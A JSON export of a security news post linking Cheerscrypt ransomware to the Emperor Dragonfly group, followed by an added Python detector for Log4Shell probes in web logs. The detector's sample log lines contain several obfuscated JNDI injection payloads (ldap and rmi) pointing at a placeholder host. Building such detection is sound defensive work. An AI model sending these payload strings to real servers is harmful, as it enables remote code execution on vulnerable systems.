{"id":7564,"date":"2022-10-04T17:02:26","date_gmt":"2022-10-04T08:02:26","guid":{"rendered":"https:\/\/cyberenso.jp\/?p=7564"},"modified":"2022-11-21T17:06:42","modified_gmt":"2022-11-21T08:06:42","slug":"cheerscrypt-ransomware-has-been-linked-to-the-chinese-hacking-group-emperor-dragonfly","status":"publish","type":"post","link":"https:\/\/cyberenso.jp\/en\/cheerscrypt-ransomware-has-been-linked-to-the-chinese-hacking-group-emperor-dragonfly\/","title":{"rendered":"Cheerscrypt ransomware has been linked to the Chinese hacking group, Emperor Dragonfly"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"7564\" class=\"elementor elementor-7564\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-96ed1a3 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"96ed1a3\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ff0a2a6\" data-id=\"ff0a2a6\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c6a304 elementor-widget elementor-widget-text-editor\" data-id=\"7c6a304\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<p>On Monday, 3 October 2022, the cyber security company Sygnia published an article on its investigation of a Cheerscrypt ransomware attack that used the same TTPs as Night Sky ransomware. Further analysis revealed that Cheerscrypt and Night Sky are both rebrands of payloads used by the same threat group, which Sygnia has dubbed \u2018Emperor Dragonfly\u2019.<\/p><p>The TTPs that were identified were exploitation of the Apache Log4j \u2018Log4Shell\u2019 vulnerability (CVE-2021-44228) to execute PowerShell commands, which in turn set up the DLL side-loading technique characteristic of the group, and the dropping of a Cobalt Strike beacon that connected to a C2 address previously associated with Night Sky operations.<\/p><p>In June 2022, both Secureworks and Microsoft reported that the group now called \u2018Emperor Dragonfly\u2019 had been observed using multiple ransomware families, including Night Sky, Rook, Pandora and AtomSilo, to conduct government-sponsored cyberespionage disguised as financially motivated attacks. Cheerscrypt is therefore believed to be another instance of Emperor Dragonfly&#8217;s continual payload rebranding, intended to frustrate attribution.<\/p>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>On Monday, 3 October 2022, the cyber security company Sygnia published an article on its investigation of a Cheerscrypt ransomware attack that used the same TTPs as Night Sky ransomware. Further analysis revealed that Cheerscrypt and Night Sky are both rebrands of payloads used by the same threat group, which Sygnia has dubbed \u2018Emperor Dragonfly\u2019. 
The TTPs that were identified were<span class=\"excerpt-hellip\"> [\u2026]<\/span><\/p>\n","protected":false},"author":1,"featured_media":7569,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,10,12,2,1],"tags":[],"class_list":["post-7564","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-latest_news","category-latest_vulnerabilities","category-read_article","category-ce_news","category-uncategorized"],"acf":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/cyberenso.jp\/wp-content\/uploads\/2022\/11\/Picture1-7.jpg?fit=1377%2C918&ssl=1","_links":{"self":[{"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/posts\/7564"}],"collection":[{"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/comments?post=7564"}],"version-history":[{"count":6,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/posts\/7564\/revisions"}],"predecessor-version":[{"id":7572,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/posts\/7564\/revisions\/7572"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/media\/7569"}],"wp:attachment":[{"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/media?parent=7564"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/categories?post=7564"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/tags?post=7564"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
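The initial access the post names, exploitation of Log4Shell (CVE-2021-44228), leaves a recognisable footprint in web-server access logs: a JNDI lookup string such as `${jndi:ldap://host/x}`, frequently wrapped in nested Log4j lookups (`${lower:j}`, `${::-j}`, `${env:X:-j}`) to defeat naive string matching. The Python below is an added example, not code from the original post or from Sygnia: it collapses those obfuscations to the literal Log4j would evaluate and flags lines whose decoded form carries a JNDI callback. The access-log lines, hosts and timestamps are constructed for the example and are not indicators from the article.

```python
import re

# Innermost Log4j-style lookup: "${...}" whose body holds no nested "${", "{" or "}".
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# JNDI callback after normalisation: "jndi:<scheme>://<host[:port]>".
_JNDI_CALLBACK = re.compile(
    r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://([^/\s\"'}]+)", re.IGNORECASE
)


def _resolve(match: re.Match) -> str:
    """Collapse one innermost lookup to the literal it evaluates to.

    Covers the obfuscations common in Log4Shell probes: ${lower:x}, ${upper:x},
    ${::-x} and ${<lookup>:-x} (Log4j default-value syntax). Any other lookup is
    simply unwrapped, so nested wrappers still collapse to their inner text.
    """
    body = match.group(1)
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":
        return rest.lower()
    if sep and head.lower() == "upper":
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return body


def normalize_lookups(text: str) -> str:
    """Repeatedly collapse innermost lookups until none remain.

    Every pass removes at least one "${...}" and the replacement text can never
    contain "$", "{" or "}", so the loop terminates on crafted input too.
    """
    while _INNER_LOOKUP.search(text):
        text = _INNER_LOOKUP.sub(_resolve, text)
    return text


def scan_log_lines(lines) -> list:
    """Return one hit per log line whose normalised form carries a JNDI callback."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        m = _JNDI_CALLBACK.search(normalized)
        if m:
            hits.append({
                "line_no": line_no,
                "scheme": m.group(1).lower(),
                "host": m.group(2),
                "normalized": normalized,
            })
    return hits


# Constructed sample access-log lines (hypothetical addresses and times, not from the post).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [03/Oct/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [03/Oct/2022:10:01:07 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [03/Oct/2022:10:01:09 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.9 - - [03/Oct/2022:10:01:11 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [03/Oct/2022:10:01:13 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NaN:-j}ndi:${env:NaN:-l}dap://198.51.100.7/d}"',
    '10.0.0.3 - - [03/Oct/2022:10:01:20 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: {hit['scheme']} callback to {hit['host']}")
```

The callback host is the more useful artefact than the raw string: it is what to block at egress and what to pivot on across other hosts' logs, which is how the C2 overlap the post describes (a beacon address reused between campaigns) gets found in practice. A line that only mentions a benign lookup such as `${date:yyyy}` is left alone, so the check does not fire on ordinary Log4j templating.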